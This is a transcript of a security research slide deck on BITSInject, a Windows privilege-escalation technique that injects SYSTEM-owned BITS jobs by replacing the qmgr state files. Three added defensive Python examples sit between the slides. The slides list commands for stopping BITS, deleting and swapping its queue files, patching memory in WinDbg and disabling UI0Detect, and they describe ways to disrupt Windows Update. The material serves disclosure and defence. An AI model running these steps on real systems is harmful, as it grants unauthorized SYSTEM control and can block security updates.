BITSInject Control your BITS, get SYSTEM Dor Azouri Security - PowerPoint PPT Presentation



  1. BITSInject: Control your BITS, get SYSTEM. Dor Azouri, Security Researcher @SafeBreach

  2. Background Intelligent Transfer Service

  3. A couple more bits about BITS
     ● Available since 2001 (Windows XP)
     ● Most known use: Windows Update
     ● Advanced features

  5. DEMO: Software updating itself using BITS

  6. TOOL DEMO #1: BITSInject to open an interactive shell as NT AUTHORITY\SYSTEM, in session 0


  8. BITS Background & Terms
     ● Clients: PowerShell, bitsadmin, 3rd-party
     ● BITS Job types: Download, Upload, Upload-Reply
     ● COM Interfaces (C/C++): qmgrprxy.dll (client-side proxy), qmgr.dll (the service)
     ● State File

  13. Known Malicious Uses
      ● BITS as a malware downloader
      ● As a persistence mechanism (e.g. DNSChanger/Zlob.Q)
      ● As C&C communication

  14. The inspiration? The way WU downloads and installs updates. The drive? Jealousy ... of how WU adds SYSTEM jobs

  15. Some of LocalSystem Privileges
      ● Can open the registry keys HKLM\SECURITY and SAM
      ● On a DC: has unrestricted access to AD Domain Services
      ● Has the network privileges of the machine
      ● Covert identity

  16. Some of LocalSystem Privileges: [SYSTEM whoami] - [Administrator whoami] = (privileges whoami lists for SYSTEM but not for Administrator)
      SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeTcbPrivilege, SeCreatePermanentPrivilege, SeAuditPrivilege

  17. The Abuse

  18. The Enabling Feature: SetNotifyCmdLine

  19. Naive Try - PSEXEC
      bitsadmin /CREATE I_WANT_YOUR_SYSTEM
      bitsadmin /ADDFILE I_WANT_YOUR_SYSTEM http://site.com/software.exe c:\temp\software.exe

  20. God Created a Rock He Can’t Pick Up
      Unable to add file to job - 0x800704dd
      The operation being requested was not performed because the user has not logged on to the network
      bitsadmin /CANCEL I_WANT_YOUR_SYSTEM

  21. How does wuaueng do the things it does?
      CoSwitchCallContext to the COM interface of qmgr.dll
      qmgr!CJobManagerExternal::CreateJob -> qmgr!CJob::AddFile -> qmgr!CJob::Resume -> qmgr!CJob::Transfer -> qmgr!CJob::BeginDownload

  23. Going after wuaueng: compare the flow of calls between wuaueng and bitsadmin
      1. qmgr!CJobManagerExternal::CreateJob -- identical
      2. qmgr!CJobExternal::AddFile -- identical, but: an exception is thrown here (0x800704dd)
      Reason: bad pairing of {Client SID} and {Session ID}
      Solution: fake the {Session ID}

  25. Checkpoint #1 - AccessCheck
      ● One of the functions at the heart of the Windows security model
      ● It is boolean: GRANT or DENY
      ● IServerSecurity::CoImpersonateClient ➔ the impersonation token is checked against the job’s security descriptor ➔ IServerSecurity::CoRevertToSelf

  26. Checkpoint #1 - AccessCheck

  27. Checkpoint #2 - Active Logon: BITS requires the requesting user to be logged on for a job to continue operation
      C:\Windows\system32>qwinsta
      SESSIONNAME USERNAME ID STATE TYPE DEVICE
      0 Disc
      >console 1 1 Active
      Rdp-tcp 65536 Listen

  28. Faking Session ID: how the service resolves the caller’s session
      {Client SID} and {Session ID} = 1 (from the Job object)
      GetTokenInformation(12) (TokenSessionId) -> SwitchToLogonToken -> CloneUserToken -> CLoggedOnUsers::FindUser({SID}, ...) in {Session ID}
      {SYSTEM} is NOT logged on in session {1}

  30. Faking Session ID
      1. A breakpoint is placed just before the call to CJobManager::CloneUserToken
      2. Run CMD/PowerShell as SYSTEM using psexec:
         bitsadmin /create I_WANT_YOUR_SYSTEM
         bitsadmin /addfile I_WANT_YOUR_SYSTEM <URL> <DestinationFile>
      3. At the breakpoint, change the value returned by the GetTokenInformation call to 0, which is the SYSTEM session ID (WinDbg): Memory change: [rsp+20h]=0

  31. Faking Session ID, after the change
      {Client SID} and {Session ID} = {Session ID} = 0 (from the Job object)
      GetTokenInformation(12) -> SwitchToLogonToken -> CloneUserToken -> CLoggedOnUsers::FindUser({SID}, ...) in {Session ID}

  32. CNestedImpersonation::* takes care of the token manipulations
      CNestedImpersonation::Impersonate(void) uses ImpersonateLoggedOnUser(HANDLE hToken)
      ➔ The desired action is performed with impersonation, and then back to self

  33. public enum JOB_STATE {
        Queued, Connecting, Transferring,
        → Suspended,
        Error, TransientError, Transferred, Acknowledged, Cancelled, Unknown
      };

  34. The State File is the Supervisor
      ● Represents the job queue: C:\ProgramData\Microsoft\Network\Downloader\(qmgr0.dat|qmgr1.dat)
      ● The two files are updated alternately; the current one is recorded in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS\StateIndex

  35. The State File
      ● Straight-forward, e.g. the string representation of "SYSTEM":
        07 00 00 00 ‘S’ 00 ‘Y’ 00 ‘S’ 00 ‘T’ 00 ‘E’ 00 ‘M’ 00 00 00
        CJob::Serialize(class CQmgrWriteStateFile &) calls CQmgrStateFiles::Write(void const *, ulong) for each job property
      ● Unencrypted
      ● Partially protected


  37. sc stop bits
      timeout 5
      del /Q /F C:\ProgramData\Microsoft\Network\Downloader\*
      >> Put modified state file
      sc start bits
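From the defender's side, the sequence on this slide is also a detection opportunity: the BITS service is stopped, the queue files are deleted and rewritten by something other than the BITS host, and the service is started again. The following is an added example, not part of the talk or the BITSInject tool; it correlates those three signals over constructed, simplified telemetry records (Service Control Manager event 7036 for service state changes, Sysmon events 11 and 23 for file create and delete), and the process path for the BITS host is an assumption for this example.

```python
"""Detect a BITS state-file swap in endpoint telemetry (added example)."""
import ntpath
from datetime import datetime, timedelta

BITS_HOST = r"c:\windows\system32\svchost.exe"          # assumed legitimate writer of qmgr*.dat
DOWNLOADER_DIR = r"c:\programdata\microsoft\network\downloader"
SERVICE_NAME = "Background Intelligent Transfer Service"
SCM_STATE_CHANGE = 7036       # Service Control Manager: service entered the X state
SYSMON_FILE_CREATE = 11
SYSMON_FILE_DELETE = 23

# Constructed sample telemetry (not real logs); fields simplified from Sysmon and SCM events
SAMPLE_EVENTS = [
    {"time": "2017-07-26T10:00:00", "event_id": 7036,
     "message": "The Background Intelligent Transfer Service service entered the stopped state."},
    {"time": "2017-07-26T10:00:02", "event_id": 23, "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"},
    {"time": "2017-07-26T10:00:02", "event_id": 23, "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"},
    {"time": "2017-07-26T10:00:05", "event_id": 11, "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"},
    {"time": "2017-07-26T10:00:10", "event_id": 7036,
     "message": "The Background Intelligent Transfer Service service entered the running state."},
    # Benign: the BITS host itself rewriting its queue file later in the day
    {"time": "2017-07-26T11:00:00", "event_id": 11, "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"},
]


def _ts(ev):
    return datetime.fromisoformat(ev["time"])


def is_queue_file(path):
    """True for qmgr*.dat files inside the BITS queue directory (case-insensitive)."""
    p = path.lower()
    return p.startswith(DOWNLOADER_DIR + "\\") and ntpath.basename(p).startswith("qmgr")


def foreign_queue_writes(events):
    """Create/delete events on the queue files by anything other than the BITS host."""
    return [ev for ev in events
            if ev["event_id"] in (SYSMON_FILE_CREATE, SYSMON_FILE_DELETE)
            and is_queue_file(ev["target"])
            and ev["image"].lower() != BITS_HOST]


def _bits_state(ev):
    """'stopped' / 'running' for SCM 7036 events about BITS, otherwise None."""
    if ev["event_id"] != SCM_STATE_CHANGE or SERVICE_NAME not in ev.get("message", ""):
        return None
    for state in ("stopped", "running"):
        if f"entered the {state} state" in ev["message"]:
            return state
    return None


def find_state_file_swaps(events, window_seconds=120):
    """Correlate: BITS stopped -> foreign queue-file writes -> BITS running, within the window."""
    events = sorted(events, key=_ts)
    foreign = foreign_queue_writes(events)
    findings = []
    for i, ev in enumerate(events):
        if _bits_state(ev) != "stopped":
            continue
        stop_t = _ts(ev)
        deadline = stop_t + timedelta(seconds=window_seconds)
        restart = next((e for e in events[i + 1:]
                        if _bits_state(e) == "running" and _ts(e) <= deadline), None)
        if restart is None:
            continue
        in_window = [e for e in foreign if stop_t <= _ts(e) <= _ts(restart)]
        if in_window:
            findings.append({
                "stopped": ev["time"],
                "restarted": restart["time"],
                "files": sorted({ntpath.basename(e["target"]).lower() for e in in_window}),
                "actors": sorted({e["image"] for e in in_window}),
            })
    return findings


if __name__ == "__main__":
    for finding in find_state_file_swaps(SAMPLE_EVENTS):
        print("possible BITS queue replacement:", finding)
```

A foreign write to qmgr0.dat or qmgr1.dat is suspicious on its own (foreign_queue_writes), but the stop/write/start triple is the stronger signal because the running service keeps the files in use; a change to the StateIndex value mentioned on slide 34 outside of the service's own writes is a natural fourth signal to add.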


  40. Name (Level)   SID            Use
      Untrusted (0)  S-1-16-0x0     Used by processes started by the Anonymous group. It blocks most write access.
      Low (1)        S-1-16-0x1000  Used by Protected Mode Internet Explorer.
      Medium (2)     S-1-16-0x2000  Used by normal applications being launched while UAC is enabled.
      High (3)       S-1-16-0x3000  Used by applications launched through UAC elevation, or if UAC is disabled and the user is an administrator.
      System (4)     S-1-16-0x4000  Used by services and other system-level applications (Wininit, Winlogon, Smss...).

  41. Migration of the Queue: just copy-paste the state files between machines
      Windows 7 header:  F5 6A 19 2B 7C 00 8F 43 8D 12 1C FC A4 CC 9B 76
      Windows 10 header: 28 32 ED 09 A6 C7 E9 45 8F 6D 36 D9 46 C2 7C 3E 00 00 00 00 00 00 00 00


  43. A Cleaner Method: layout of the state file
      Version Dependent Header
      State File Header
      Queue Header
      Jobs Counter = n (n++)
      Job Header / Job #0 / Job Footer
      Job Header / Job #x / Job Footer
      ...
      Job Header / Job #n / Job Footer
      Queue Footer
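Slides 35, 41 and 43 together give enough of the on-disk format to triage a queue file during an investigation: the version-dependent header bytes and the serialized string layout (a 32-bit little-endian character count that includes the terminating NUL, followed by UTF-16LE text). The code below is an added example and not the BITSInject parser; because the slides do not give the job header and footer byte sequences, it does not walk the job structure but instead identifies the header and extracts every well-formed string record, which is what usually exposes job names, URLs, destination paths and notification command lines. The sample queue bytes are constructed from the strings used in the slides' bitsadmin example.

```python
"""Triage helpers for the BITS queue files qmgr0.dat / qmgr1.dat (added example)."""
import struct

# Version-dependent headers from slide 41 (the Windows 10 header is 16 bytes plus 8 zero bytes)
HEADERS = {
    "Windows 7": bytes.fromhex("F56A192B7C008F438D121CFCA4CC9B76"),
    "Windows 10": bytes.fromhex("2832ED09A6C7E9458F6D36D946C27C3E" + "00" * 8),
}


def identify_header(blob):
    """Return the Windows version whose header opens the blob, or None."""
    for name, magic in HEADERS.items():
        if blob.startswith(magic):
            return name
    return None


def read_string(blob, offset):
    """Decode one serialized string at offset (slide 35 layout).
    Returns (text, next_offset) or None when the bytes are not a well-formed record."""
    if offset + 4 > len(blob):
        return None
    (count,) = struct.unpack_from("<I", blob, offset)   # char count, NUL included
    end = offset + 4 + count * 2
    if count == 0 or end > len(blob):
        return None
    raw = blob[offset + 4:end]
    if raw[-2:] != b"\x00\x00":                          # must end with a UTF-16 NUL
        return None
    try:
        text = raw[:-2].decode("utf-16-le")
    except UnicodeDecodeError:
        return None
    if "\x00" in text or not text.isprintable():
        return None
    return text, end


def encode_string(text):
    """Inverse of read_string; reproduces the 'SYSTEM' byte layout shown on slide 35."""
    data = text.encode("utf-16-le") + b"\x00\x00"
    return struct.pack("<I", len(data) // 2) + data


def scan_strings(blob, min_len=2):
    """Try every byte offset and collect well-formed string records.
    The job header/footer layout is not on the slides, so jobs are not parsed as units."""
    found = []
    off = 0
    while off < len(blob):
        rec = read_string(blob, off)
        if rec and len(rec[0]) >= min_len:
            found.append(rec[0])
            off = rec[1]
        else:
            off += 1
    return found


def triage(blob):
    """Version guess plus the strings an analyst would look at first."""
    return {"version": identify_header(blob), "strings": scan_strings(blob)}


# Constructed sample queue (not a real qmgr0.dat): Windows 10 header, one filler
# dword, three strings from the slides' bitsadmin example, and trailing junk.
SAMPLE_QUEUE = (
    HEADERS["Windows 10"]
    + b"\x01\x00\x00\x00"
    + encode_string("I_WANT_YOUR_SYSTEM")
    + encode_string("http://site.com/software.exe")
    + encode_string(r"c:\temp\software.exe")
    + b"\xff\xff\xff\xff"
)

if __name__ == "__main__":
    print(triage(SAMPLE_QUEUE))
```

Run triage over both qmgr0.dat and qmgr1.dat and compare them with the StateIndex value from slide 34: the non-current file is the previous generation of the queue, so a job that appears in only one of them, or a job whose owner and destination path do not match any legitimate update activity, is worth a closer look.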

  44. BITSInject
      ● Injects a job with LocalSystem as owner
      ● The job is removed when finished
      ● Allows editing some of the job’s parameters, more in the future

  45. Interactive Services Detection - UI0Detect
      sc stop UI0Detect
      reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows /v NoInteractiveServices /t REG_DWORD /d 1 /f
      sc start UI0Detect
      OR: a non-interactive exe

  46. TOOL DEMO #2: BITSInject non-interactive command

  47. SimpleBITSServer
      ● A simple Python implementation of a BITS server
      ● Can respond without a Content-Length header
      ● Accelerates the method by pushing the job into the ERROR state
      ● On Windows 10: fake the VSN to avoid network traffic

  48. The Enabling Conditions
      ● Relying on state file data without verification
      ● Lack of unique machine identification
      ● File permissions integrity
      ● Clear, straight-forward object serialization to disk
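The first two enabling conditions (no verification of the state file, no machine identification) describe what a fix would have to add. As an added illustration of that mitigation, and not a description of how BITS actually protects its queue (the slides say it does not), the example below seals a serialized queue with an HMAC whose key is derived from a per-machine secret: a queue copied from another machine (slide 41) or edited offline (slide 37) fails verification. The secrets, the queue bytes and the key-derivation label are all constructed for the example.

```python
"""Machine-bound integrity seal for a serialized job queue (added illustration)."""
import hashlib
import hmac

TAG_LEN = hashlib.sha256().digest_size   # 32 bytes


def derive_queue_key(machine_secret, purpose=b"queue-seal-v1"):
    """Bind the sealing key to a per-machine secret, so a seal made elsewhere cannot verify here."""
    return hmac.new(machine_secret, purpose, hashlib.sha256).digest()


def seal_queue(queue_bytes, machine_secret):
    """Append an HMAC-SHA256 tag over the serialized queue."""
    tag = hmac.new(derive_queue_key(machine_secret), queue_bytes, hashlib.sha256).digest()
    return queue_bytes + tag


def open_queue(sealed, machine_secret):
    """Return the queue bytes if the tag verifies for this machine, else None."""
    if len(sealed) < TAG_LEN:
        return None
    body, tag = sealed[:-TAG_LEN], sealed[-TAG_LEN:]
    expected = hmac.new(derive_queue_key(machine_secret), body, hashlib.sha256).digest()
    return body if hmac.compare_digest(tag, expected) else None


# Constructed values for the example (not real machine secrets or queue data)
MACHINE_A_SECRET = b"constructed-secret-for-machine-A"
MACHINE_B_SECRET = b"constructed-secret-for-machine-B"
QUEUE = b"\x01\x00\x00\x00" + "I_WANT_YOUR_SYSTEM".encode("utf-16-le") + b"\x00\x00"


def demo():
    """Same machine verifies; a migrated copy and an offline edit both fail."""
    sealed = seal_queue(QUEUE, MACHINE_A_SECRET)
    same_machine = open_queue(sealed, MACHINE_A_SECRET)
    migrated = open_queue(sealed, MACHINE_B_SECRET)        # copied from another machine
    edited = bytearray(sealed)
    edited[4] ^= 0x01                                      # flip one byte of the job name
    offline_edit = open_queue(bytes(edited), MACHINE_A_SECRET)
    return same_machine == QUEUE, migrated is None, offline_edit is None


if __name__ == "__main__":
    print(demo())
```

The seal only helps against a principal who can write the file but cannot read the machine secret; an administrator who can read it can simply re-seal, which is the substance of the MSRC response quoted later in the deck.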

  49. Other Potential Abuses: interfere with a software update job
      1. WU-choking using file name exhaustion: C:\Windows\SoftwareDistribution\Download\GUID\BIT[0-9A-F]{1,4}\.tmp (69,904 possible names)
      2. Change job state using BITSInject.py
      3. Completely remove a job from the queue using BITSInject.py

  53. MSRC: “...A malicious administrator can do much worse things.”

  54. Links
      BITSInject (Tool code + Parser): https://github.com/SafeBreach-Labs/BITSInject
      SimpleBITSServer: https://github.com/SafeBreach-Labs/SimpleBITSServer
      Email: dor.azouri@safebreach.com
      Twitter: @bemikre
